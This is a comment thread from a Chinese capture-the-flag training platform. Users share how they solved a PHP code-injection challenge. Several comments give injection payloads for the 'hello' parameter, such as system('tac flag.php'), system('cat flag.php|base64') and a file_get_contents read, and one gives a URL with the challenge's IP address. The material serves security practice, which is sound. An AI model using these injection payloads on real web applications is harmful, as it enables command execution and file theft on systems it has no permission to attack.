评分(9)
解题动态
QyQ7 攻破了该题 6小时前
睡觉的西瓜 攻破了该题 6小时前
xiayuan 攻破了该题 9小时前
zhuimengpi 攻破了该题 11小时前
卡卡罗特M 攻破了该题 13小时前
silkylatte 攻破了该题 14小时前
Hooo 攻破了该题 15小时前
zzy12 攻破了该题 17小时前
zhuzhu90 攻破了该题 17小时前
2022011179 攻破了该题 18小时前
13552995396 攻破了该题 20小时前
2022011186 攻破了该题 20小时前
2316252803 攻破了该题 20小时前
libingfei 攻破了该题 20小时前
shunsong 攻破了该题 20小时前
wangsitu 攻破了该题 20小时前
公司团建奖品是她 攻破了该题 20小时前
1f04 攻破了该题 20小时前
supply 攻破了该题 20小时前
评论
lordinglord 7天前
举报
构造闭合,?hello=);var_dump(file_get_contents('flag.php'));//
金智秀的老公 20天前
举报
金智秀的老公到此一游
Pixelw 23天前
举报
http://117.72.52.127:15551/?hello=system(%27tac%20flag.php%27)
Pixelw 23天前
举报
Too Young Too Simple
lfs451 24天前
举报
?hello=highlight_file(%27flag.php%27)
传奇吉他手千早爱音 24天前
举报
比F和弦简单
liuguowang75 1月前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 1月前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
Gargantua 1月前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 1月前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 2月前
举报
flag{***}